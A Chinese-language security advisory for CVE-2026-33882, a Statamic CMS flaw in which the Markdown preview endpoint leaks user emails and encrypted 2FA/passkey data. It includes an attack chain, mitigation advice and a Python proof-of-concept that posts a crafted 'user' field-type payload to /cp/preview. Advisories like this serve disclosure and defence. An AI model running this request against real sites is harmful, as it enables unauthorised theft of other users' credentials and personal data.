CVE-2026-33882 CVSS 6.5 中危

CVE-2026-33882 Statamic 敏感信息泄露漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33882

漏洞类型

敏感信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Statamic CMS

漏洞概述

Statamic CMS在5.73.16和6.7.2之前的版本存在安全漏洞。由于Markdown预览端点未严格校验，攻击者可操纵其返回任意字段类型数据。特别是利用用户字段类型，认证用户能窃取敏感信息，包含邮箱、加密passkey及2FA代码。

技术细节

该漏洞源于Statamic CMS中Markdown预览端点的逻辑缺陷。攻击者通过构造恶意请求，操纵端点参数，将渲染目标从普通文本更改为“用户”字段类型。由于服务端未对字段类型的访问权限及渲染上下文实施严格校验，导致端点响应了用户对象的增强数据结构。这意味着任何拥有控制面板访问权限的认证用户，都可以利用此接口提取系统内其他用户的敏感信息。泄露的数据包括但不限于电子邮件地址、存储的加密Passkey数据以及加密的双重验证代码。尽管敏感字段经过加密处理，但数据的直接泄露为离线破解或社会工程学攻击提供了可乘之机。

攻击链分析

STEP 1

步骤1：认证访问

攻击者获取Statamic控制面板的低权限账户凭证。

STEP 2

步骤2：发送恶意请求

攻击者向Markdown预览端点发送特制的POST请求，修改参数以请求“用户”字段类型的数据。

STEP 3

步骤3：数据泄露

服务器端未正确校验，返回了包含敏感信息（如邮箱、加密的2FA代码等）的JSON响应。

STEP 4

步骤4：利用数据

攻击者解析响应数据，获取敏感信息以进行后续的解密攻击或账户劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Concept for CVE-2026-33882
# Target: Statamic CMS < 5.73.16 / < 6.7.2
import requests

def exploit_statamic(target_url, session_cookie):
    headers = {
        "Cookie": f"statamic_session={session_cookie}",
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    
    # The endpoint responsible for previewing content
    endpoint = f"{target_url}/cp/preview"
    
    # Payload manipulating the fieldtype to 'user' to trigger data dump
    payload = {
        "preview": "text",
        "values": {
            "type": "user", # Manipulating the field type
            "value": "1"    # Targeting user ID
        },
        "handle": "email"
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers)
        if response.status_code == 200:
            print("[+] Request successful. Check response for leaked user data.")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

# Usage
# exploit_statamic("http://localhost", "valid_session_token_here")

影响范围

Statamic CMS < 5.73.16

Statamic CMS < 6.7.2

防御指南

临时缓解措施

如果无法立即升级，建议严格限制能够访问控制面板的用户IP范围，并加强对异常API请求的监控日志审计。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表